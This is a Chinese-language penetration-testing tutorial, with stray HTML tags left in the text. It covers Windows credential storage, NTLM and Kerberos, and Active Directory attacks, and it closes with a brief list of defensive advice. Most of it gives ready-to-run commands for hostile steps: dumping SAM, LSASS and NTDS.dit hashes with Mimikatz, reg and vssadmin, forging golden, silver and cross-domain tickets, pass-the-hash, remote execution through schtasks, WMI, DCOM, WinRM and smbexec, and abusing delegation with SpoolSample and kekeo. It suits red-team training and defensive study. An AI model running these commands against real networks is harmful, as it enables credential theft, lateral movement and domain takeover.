内网渗透：域认证协议与密码凭据机制深度解析<\/h1>

一、Windows密码抓取技术<\/h2>

1.1 主机登录验证机制<\/h3>

Windows系统使用两种哈希算法存储密码凭证：<\/p>

LM Hash<\/strong>：较老的DES加密算法

将密码转换为大写并补全至14字节<\/li>
分为两组7字节，每组转换为28bit后扩展为32bit<\/li>
使用魔术字符串"KGS!@#$%"作为DES密钥加密<\/li> <\/ul> <\/li>
NTLM Hash<\/strong>：更安全的MD4加密算法

将密码转换为Unicode格式（每个字节后加0x00）<\/li>
进行MD4加密生成哈希值<\/li> <\/ul> <\/li> <\/ul>
密码凭证存储在：<\/p>

SAM文件<\/strong>：%SystemRoot%\system32\config\<\/code>目录下<\/li>
LSASS进程<\/strong>：处理用户认证，可能缓存明文密码<\/li> <\/ul> 1.2 密码抓取技术<\/h3> 1.2.1 SAM文件抓取<\/h4> 导出SAM和SYSTEM文件： reg save hklm\sam sam.hive <\/span><\/span>reg save hklm\system system.hive <\/span><\/span><\/code><\/pre><\/li> 使用工具读取： Mimikatz：lsadump::sam \/sam:sam.hive \/system:system.hive<\/code><\/li> Pwdump7：获取所有账户NTLM哈希<\/li> Hashcat：破解NTLM哈希<\/li> <\/ul> <\/li> <\/ol> 1.2.2 LSASS进程抓取<\/h4> 在线读取： mimikatz.exe "privilege::debug"<\/span> "token::elevate"<\/span> "lsadump::sam"<\/span> <\/span><\/span>mimikatz.exe "sekurlsa::logonPasswords"<\/span> <\/span><\/span><\/code><\/pre><\/li> 离线读取：导出lsass.dmp文件<\/li> 使用Mimikatz解析：sekurlsa::minidump lsass.dmp<\/code><\/li> <\/ul> <\/li> <\/ol> 1.2.3 Windows 2012 R2之后的变化<\/h4> 默认不缓存明文密码，可通过修改注册表启用：<\/p> reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest \/v UseLogonCredential \/t REG_DWORD \/d 1 \/f <\/span><\/span><\/code><\/pre>1.3 其他凭证抓取<\/h3> RDP凭证<\/strong>：解密存储在%userprofile%\appdata\local\microsoft\credentials\<\/code>下的凭证文件<\/li> 浏览器密码<\/strong>：使用BrowserGhost、Sharp-HackBrowserData等工具<\/li> 数据库密码<\/strong>：使用SharpDecryptPwd等工具<\/li> <\/ul> 二、主机间认证协议<\/h2> 2.1 NTLM协议（挑战\/响应机制）<\/h3> 客户端发送用户名到服务器<\/li> 服务器生成16位随机Challenge，用用户NTLM Hash加密生成Challenge1<\/li> 服务器发送Challenge给客户端<\/li> 客户端用用户NTLM Hash加密Challenge生成Response返回<\/li> 服务器比较Response和Challenge1<\/li> <\/ol> 2.2 Kerberos协议（域认证）<\/h3> 2.2.1 核心组件<\/h4> AS<\/strong>（认证服务器）：发放TGT（票据授予票据）<\/li> TGS<\/strong>（票据授予服务器）：发放ST（服务票据）<\/li> KDC<\/strong>（密钥分发中心）：包含AS和TGS<\/li> <\/ul> 2.2.2 认证流程<\/h4> AS-REQ\/AS-REP<\/strong>（客户端与AS通信）：<\/p> 客户端发送用户名、IP、时间戳<\/li> AS返回： TGT（用TGS密钥加密，包含Session_key(CT_SK)）<\/li> 客户端密钥加密的内容（包含CT_SK）<\/li> <\/ul> <\/li> <\/ul> <\/li> TGS-REQ\/TGS-REP<\/strong>（客户端与TGS通信）：<\/p> 客户端发送：用CT_SK加密的客户端信息<\/li> 目标服务名（明文）<\/li> TGT<\/li> <\/ul> <\/li> TGS返回： ST（用服务密钥加密，包含CS_SK）<\/li> 用CT_SK加密的内容（包含CS_SK）<\/li> <\/ul> <\/li> <\/ul> <\/li> AP-REQ\/AP-REP<\/strong>（客户端与服务端通信）：<\/p> 客户端发送：用CS_SK加密的客户端信息<\/li> ST<\/li> <\/ul> <\/li> 服务端验证后建立连接<\/li> <\/ul> <\/li> <\/ol> 三、票据攻击技术<\/h2> 3.1 黄金票据（Golden Ticket）<\/h3> 原理<\/strong>：伪造TGT，需要krbtgt账户的NTLM Hash<\/p> 制作条件<\/strong>：<\/p> 域名<\/li> 域SID<\/li> krbtgt账户的NTLM Hash<\/li> 伪造的用户名<\/li> <\/ol> 步骤<\/strong>：<\/p> mimikatz "kerberos::golden \/domain:域名 \/sid:域SID \/krbtgt:krbtgt的NTLM Hash \/user:伪造用户名 \/ticket:golden.kirbi"<\/span> <\/span><\/span>kerberos::ptt golden.kirbi <\/span><\/span><\/code><\/pre>3.2 白银票据（Silver Ticket）<\/h3> 原理<\/strong>：伪造ST，需要服务账户的NTLM Hash<\/p> 制作条件<\/strong>：<\/p> 域名<\/li> 域SID<\/li> 目标服务器名<\/li> 服务账号的NTLM Hash<\/li> 伪造的用户名<\/li> <\/ol> 步骤<\/strong>：<\/p> mimikatz "kerberos::golden \/domain:域名 \/sid:域SID \/target:目标服务器 \/service:服务类型 \/rc4:服务账号NTLM Hash \/user:伪造用户名 \/ticket:silver.kirbi"<\/span> <\/span><\/span>kerberos::ptt silver.kirbi <\/span><\/span><\/code><\/pre>3.3 高级票据技术<\/h3> 钻石票据<\/strong>：修改真实TGT的PAC，需要krbtgt的AES256密钥<\/li> 蓝宝石票据<\/strong>：使用Kerberos委派获取高权限用户的PAC替换原始PAC<\/li> <\/ul> 四、内网横向移动技术<\/h2> 4.1 凭证传递攻击<\/h3> Pass the Hash (PTH)<\/strong>：<\/p> mimikatz "sekurlsa::pth \/user:用户名 \/domain:域名 \/ntlm:NTLM Hash"<\/span> <\/span><\/span><\/code><\/pre><\/li> Pass the Key (PTK)<\/strong>：<\/p> mimikatz "sekurlsa::pth \/user:用户名 \/domain:域名 \/aes256:AES密钥"<\/span> <\/span><\/span><\/code><\/pre><\/li> Pass the Ticket (PTT)<\/strong>：<\/p> mimikatz "sekurlsa::tickets \/export"<\/span> <\/span><\/span>mimikatz "kerberos::ptt 票据文件"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.2 远程执行技术<\/h3> IPC$配合计划任务<\/strong>：<\/p> net use \\目标IP\ipc$ "密码"<\/span> \/user:用户名 <\/span><\/span>copy<\/span> 恶意文件 \\目标IP\C$ <\/span><\/span>schtasks \/create \/s 目标IP \/tn 任务名 \/sc onstart \/tr C:\恶意文件 \/ru system \/f <\/span><\/span>schtasks \/run \/s 目标IP \/tn 任务名 <\/span><\/span><\/code><\/pre><\/li> WMI远程执行<\/strong>：<\/p> wmic \/node:目标IP \/user:用户名 \/password:密码 process call create "cmd.exe \/c 命令"<\/span> <\/span><\/span><\/code><\/pre><\/li> DCOM远程执行<\/strong>：<\/p> $com = [activator]<\/span>::CreateInstance([type]<\/span>::GetTypeFromProgID("MMC20.Application"<\/span>,"目标IP"<\/span>)) <\/span><\/span>$com.Document.ActiveView.ExecuteShellCommand('cmd.exe'<\/span>,$null,"\/c 命令"<\/span>,"Minimzed"<\/span>) <\/span><\/span><\/code><\/pre><\/li> WinRM远程执行<\/strong>：<\/p> winrs -r:http:\/\/目标IP:5985 -u:用户名 -p:密码 "命令"<\/span> <\/span><\/span><\/code><\/pre><\/li> SMB远程执行<\/strong>：<\/p> smbexec 域名\/用户名:密码@目标IP <\/span><\/span>smbexec -hashes :NTLM Hash 域名\/用户名@目标IP <\/span><\/span><\/code><\/pre><\/li> <\/ol> 五、域控安全与跨域攻击<\/h2> 5.1 NTDS.dit文件获取<\/h3> ntdsutil.exe方法<\/strong>：<\/p> ntdsutil snapshot "activate instance ntds"<\/span> create quit quit <\/span><\/span>ntdsutil snapshot "mount {GUID}"<\/span> quit quit <\/span><\/span>copy<\/span> MOUNT_POINT\windows\NTDS\ntds.dit C:\ntds.dit <\/span><\/span>ntdsutil snapshot "unmount {GUID}"<\/span> quit quit <\/span><\/span>ntdsutil snapshot "delete {GUID}"<\/span> quit quit <\/span><\/span><\/code><\/pre><\/li> vssadmin方法<\/strong>：<\/p> vssadmin create shadow \/for=C: <\/span><\/span>copy<\/span> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\ntds.dit C:\ntds.dit <\/span><\/span>vssadmin delete shadows \/for=C: \/quiet <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5.2 跨域攻击技术<\/h3> 利用域信任关系<\/strong>：<\/p> 查看信任关系：nltest \/domain_trust<\/code><\/li> 获取信任密钥：mimikatz "lsadump::trust \/patch"<\/code><\/li> <\/ul> <\/li> 构造跨域黄金票据<\/strong>：<\/p> mimikatz "kerberos::golden \/domain:子域 \/sid:子域SID \/sids:父域SID-519 \/rc4:信任密钥 \/user:任意用户 \/service:krbtgt \/target:父域 \/ticket:跨域票据.kirbi"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 六、域内委派攻击<\/h2> 6.1 非约束委派攻击<\/h3> 利用条件<\/strong>：服务账户配置了非约束委派<\/p> 攻击步骤<\/strong>：<\/p> 查询非约束委派账户：<\/p> AdFind.exe -b "DC=域,DC=com"<\/span> -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))"<\/span> <\/span><\/span><\/code><\/pre><\/li> 诱导域管访问（如利用打印机漏洞）：<\/p> SpoolSample.exe 域控已控机器 <\/span><\/span><\/code><\/pre><\/li> 导出并利用域管TGT<\/p> <\/li> <\/ol> 6.2 约束委派攻击<\/h3> 利用条件<\/strong>：服务账户配置了约束委派<\/p> 攻击步骤<\/strong>：<\/p> 查询约束委派账户：<\/p> AdFind.exe -b "DC=域,DC=com"<\/span> -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))"<\/span> <\/span><\/span><\/code><\/pre><\/li> 获取服务账户NTLM Hash<\/p> <\/li> 使用kekeo构造票据：<\/p> kekeo "tgt::ask \/user:服务账户 \/domain:域 \/password:密码"<\/span> <\/span><\/span>kekeo "tgs::s4u \/tgt:TGT票据 \/user:域管@域 \/service:目标服务"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6.3 基于资源的约束委派<\/h3> 利用条件<\/strong>：拥有修改服务账户属性的权限<\/p> 攻击步骤<\/strong>：<\/p> 设置服务账户的msDS-AllowedToActOnBehalfOfOtherIdentity属性<\/li> 使用S4U2Self和S4U2Proxy协议获取服务票据<\/li> <\/ol> 七、防御建议<\/h2> 密码保护<\/strong>：<\/p> 使用Protected Users安全组<\/li> 定期修改krbtgt账户密码<\/li> 启用LSA保护<\/li> <\/ul> <\/li> 委派控制<\/strong>：<\/p> 限制非约束委派的使用<\/li> 审核约束委派配置<\/li> 实施基于资源的约束委派<\/li> <\/ul> <\/li> 监控与检测<\/strong>：<\/p> 监控异常Kerberos票据请求<\/li> 检测异常的横向移动行为<\/li> 审计敏感账户的登录活动<\/li> <\/ul> <\/li> 补丁管理<\/strong>：<\/p> 及时安装安全补丁（如MS14-068）<\/li> 禁用过时的协议（如LM认证）<\/li> <\/ul> <\/li> 权限管理<\/strong>：<\/p> 遵循最小权限原则<\/li> 限制本地管理员账户的使用<\/li> 实施特权访问管理(PAM)<\/li> <\/ul> <\/li> <\/ol>